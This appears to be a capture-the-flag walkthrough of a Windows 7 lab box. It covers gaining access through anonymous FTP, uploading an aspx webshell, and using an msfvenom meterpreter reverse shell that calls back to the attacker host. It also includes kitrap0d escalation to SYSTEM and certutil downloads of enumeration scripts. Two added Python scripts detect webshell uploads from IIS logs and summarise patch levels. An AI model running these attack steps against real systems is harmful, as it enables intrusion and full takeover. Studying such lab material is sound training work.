Prerequisites

Anonymous FTP login, arbitrary file upload, generating a webshell with msfvenom, post-exploitation with meterpreter

Information gathering

Probe the open ports and services with nmap:

nmap 10.10.10.5

Result:

Nmap scan report for 10.10.10.5
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
Nmap done: 1 IP address (1 host up) scanned in 29.83 seconds

Port 80 (http) is open, so there should be a web service. As usual, scan for directories.

Directory scan

dirb http://10.10.10.5/

While the directory scan is running, also check for known vulnerabilities:

nmap --script=vuln 10.10.10.5

This turned out not to find anything.

With both scans running, don't waste the time: check whether the FTP server allows anonymous login.

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

There is an interesting directory here:

ftp> cd aspnet_client
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> cd  2_0_50727
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

At this point the directory tree reachable over FTP looks like the web root, which matches what dirb has already found:

URL_BASE: http://10.10.10.5/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.5/ ----
==> DIRECTORY: http://10.10.10.5/aspnet_client/

Try uploading a reverse shell directly; since the target is Windows, use an aspx webshell.

Getshell

Use the aspx webshell that ships with Kali. In a second terminal:

cp /usr/share/webshells/aspx/cmdasp.aspx shell.aspx

Back in the FTP terminal, return to the root directory and run:

ftp> put ./shell.aspx
local: ./shell.aspx remote: ./shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (62.5090 MB/s)
ftp>

Open http://10.10.10.5/shell.aspx in the browser.

Command execution works, but this webshell is fairly basic, so it will be swapped for another one shortly.
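From the defender's side, the whole foothold above is visible in two IIS logs: the FTP log records the anonymous STOR of shell.aspx, and the web log records the first GET of /shell.aspx a moment later. The following detection script is an added example, not part of the original writeup. It correlates the two logs and reports every successful FTP upload of a server-side script that is subsequently requested over HTTP. The log lines are constructed, and the column layout assumed for both logs follows the W3C extended format IIS writes; check the #Fields: header of your own logs before relying on the positions (real IIS logs also replace spaces in the User-Agent with '+', which keeps the whitespace split used here valid).

```python
"""Correlate IIS FTP uploads of script files with later HTTP requests to them.

Added example for this writeup (not the author's code). Sample logs below are
constructed; the field layout is an assumption about IIS W3C extended logs.
"""
from datetime import datetime

# Constructed IIS FTP log (assumed W3C layout). STOR = upload.
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2020-12-05 11:40:02 10.10.14.16 - 10.10.10.5 21 USER anonymous 331 0
2020-12-05 11:40:03 10.10.14.16 anonymous 10.10.10.5 21 PASS *** 230 0
2020-12-05 11:40:05 10.10.14.16 anonymous 10.10.10.5 21 LIST - 226 0
2020-12-05 11:40:10 10.10.14.16 anonymous 10.10.10.5 21 STOR shell.aspx 226 0
2020-12-05 11:41:00 10.10.14.16 anonymous 10.10.10.5 21 STOR notes.txt 226 0
"""

# Constructed IIS web log for the same site (assumed W3C layout).
WEB_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-12-05 11:40:30 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.16 Mozilla/5.0 200
2020-12-05 11:40:45 10.10.10.5 GET /shell.aspx - 80 - 10.10.14.16 Mozilla/5.0 200
2020-12-05 11:41:20 10.10.10.5 GET /notes.txt - 80 - 10.10.14.16 Mozilla/5.0 200
"""

# Extensions IIS (or a co-hosted runtime) would execute rather than serve as data.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields: header."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # header may change mid-file
            continue
        if line.startswith("#") or fields is None:
            continue                           # other directives / no header yet
        values = line.split()
        if len(values) != len(fields):
            continue                           # skip rather than mis-align columns
        rows.append(dict(zip(fields, values)))
    return rows


def _timestamp(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")


def find_webshell_uploads(ftp_text, web_text, window_seconds=600):
    """Return one finding per successful STOR of a script file that is then
    requested over HTTP within window_seconds. Assumes the FTP root is the
    site's wwwroot, as in the writeup, so 'shell.aspx' maps to '/shell.aspx'."""
    web_rows = parse_w3c(web_text)
    findings = []
    for f in parse_w3c(ftp_text):
        if f.get("cs-method") != "STOR" or not f.get("sc-status", "").startswith("2"):
            continue
        name = f["cs-uri-stem"]
        if not name.lower().endswith(SCRIPT_EXTENSIONS):
            continue
        uploaded_at = _timestamp(f)
        url_path = "/" + name.lstrip("/")
        for w in web_rows:
            if w.get("cs-uri-stem", "").lower() != url_path.lower():
                continue
            delta = (_timestamp(w) - uploaded_at).total_seconds()
            if 0 <= delta <= window_seconds:
                findings.append({
                    "path": url_path,
                    "ftp_user": f["cs-username"],
                    "ftp_ip": f["c-ip"],
                    "http_ip": w["c-ip"],
                    "seconds": int(delta),
                })
                break                          # first request is enough to alert
    return findings


if __name__ == "__main__":
    for hit in find_webshell_uploads(FTP_LOG, WEB_LOG):
        print("script uploaded via FTP and then requested over HTTP:", hit)
```

On the constructed sample this reports only shell.aspx: notes.txt is uploaded and fetched too, but a .txt file is served as data, so it is not an executable upload. The FTP username in the finding is the second thing to look at; an "anonymous" uploader writing into the web root is the misconfiguration this box is built on.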

Check the system architecture with systeminfo:

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ££
System Boot Time:          8/12/2020, 3:33:21 ££
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 732 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.522 MB
Virtual Memory: In Use:    525 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
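The systeminfo output above contains exactly the facts that decide what comes next on this box: a 32-bit process view (X86-based PC), Windows 7 build 7600 and "Hotfix(s): N/A", i.e. no patches at all. The following parser is an added example, not part of the original writeup: it turns systeminfo's "Key:   value" text (including indented continuation lines and keys that themselves contain a colon) into a dictionary and summarises the OS, build, architecture and installed hotfix list the way a patch review would. The sample text is constructed from the values shown above; the field names are the ones systeminfo prints in an English locale.

```python
"""Parse `systeminfo` output into a patch-review summary.

Added example for this writeup (not the author's code). The sample below is
constructed from the values the writeup shows.
"""
import re

SYSTEMINFO_SAMPLE = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
Registered Owner:          babis
Registered Organization:
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
Virtual Memory: Max Size:  2.047 MB
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# "Key:<two or more spaces>value" or "Key:" with nothing after it. Requiring at
# least two spaces after the separating colon keeps keys that contain a colon
# themselves ("Virtual Memory: Max Size") in one piece.
LINE_RE = re.compile(r"^(\S.*?):(?:\s{2,}(.*)|\s*)$")


def parse_systeminfo(text):
    """Return {key: [value, continuation values...]} for systeminfo text."""
    info, key = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace() and key is not None:
            info[key].append(raw.strip())      # indented line continues the previous field
            continue
        match = LINE_RE.match(raw.rstrip())
        if not match:
            key = None                         # unknown line shape; don't attach to anything
            continue
        key = match.group(1).strip()
        value = (match.group(2) or "").strip()
        info[key] = [value] if value else []
    return info


def patch_summary(info):
    """Extract OS name, build number, architecture and the hotfix list."""
    os_version = info.get("OS Version", [""])[0]
    build = re.search(r"Build\s+(\d+)", os_version)
    entries = info.get("Hotfix(s)", [])
    # systeminfo prints either "N/A" or "<n> Hotfix(s) Installed." followed by
    # indented "[NN]: KBxxxxxxx" lines; keep only the KB identifiers.
    hotfixes = [e.split(":", 1)[1].strip() for e in entries[1:] if e.startswith("[")]
    system_type = info.get("System Type", [""])[0].lower()
    return {
        "os": info.get("OS Name", [""])[0],
        "build": build.group(1) if build else "",
        "arch": "x86" if system_type.startswith("x86") else "x64",
        "hotfixes": hotfixes,
        "no_hotfixes": not hotfixes,
    }


if __name__ == "__main__":
    summary = patch_summary(parse_systeminfo(SYSTEMINFO_SAMPLE))
    print(summary)
    if summary["no_hotfixes"]:
        print("no hotfixes installed on build", summary["build"], "- every kernel LPE since RTM is in scope")
```

A host that reports no hotfixes on build 7600 is exactly what the local_exploit_suggester run later in this writeup confirms from the attacker's side; feeding this summary into an inventory is the cheap way to find such machines before someone else does.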

There is no good full-featured aspx webshell at hand, so msf it is; Behinder (冰蝎) presumably can't be used in the OSCP anyway.

First generate a reverse-shell aspx payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.16 -f aspx -o reverse.aspx

Upload it via FTP as before.

Start an msf listener locally:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.16
set lport 4444
set ExitOnSession false
run

set ExitOnSession false // after this command, port 4444 keeps listening even after a session has been established

meterpreter > background
[*] Backgrounding session 21...
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 21
session => 21
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.16
lhost => 10.10.14.16
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.16:5555
[*] Launching notepad to host the exploit...
[+] Process 3968 launched.
[*] Reflectively injecting the exploit DLL into 3968...
[*] Injecting exploit into 3968 ...
[*] Exploit injected. Injecting payload into 3968...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 27 opened (10.10.14.16:5555 -> 10.10.10.5:49159) at 2020-12-05 19:44:53 +0800

Supplement: finding privilege-escalation candidates

use post/multi/recon/local_exploit_suggester
set session 21
run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Check the current privileges:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f user.txt.txt
Found 1 result...
    c:\Users\babis\Desktop\user.txt.txt (32 bytes)

What follows are the dead ends hit along the way; feel free to skip.

// Listen locally with nc -lvp 4444, then open http://10.10.10.5/reverse.aspx in the browser

// Back in the netcat terminal, a connection has been established

// Use the following scripts to check for privilege-escalation paths: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

// First start an HTTP server on the local machine: python -m SimpleHTTPServer 80

// Download it from the netcat terminal: certutil -urlcache -split -f http://10.10.14.16/winPEAS.bat c:\inetpub\wwwroot\winPEAS.bat

// Then run .\winPEAS.bat and fetch an exploit based on its output

searchsploit ms14-040

certutil -urlcache -split -f http://10.10.14.16/PowerUp.ps1 c:\inetpub\wwwroot\PowerUp.ps1
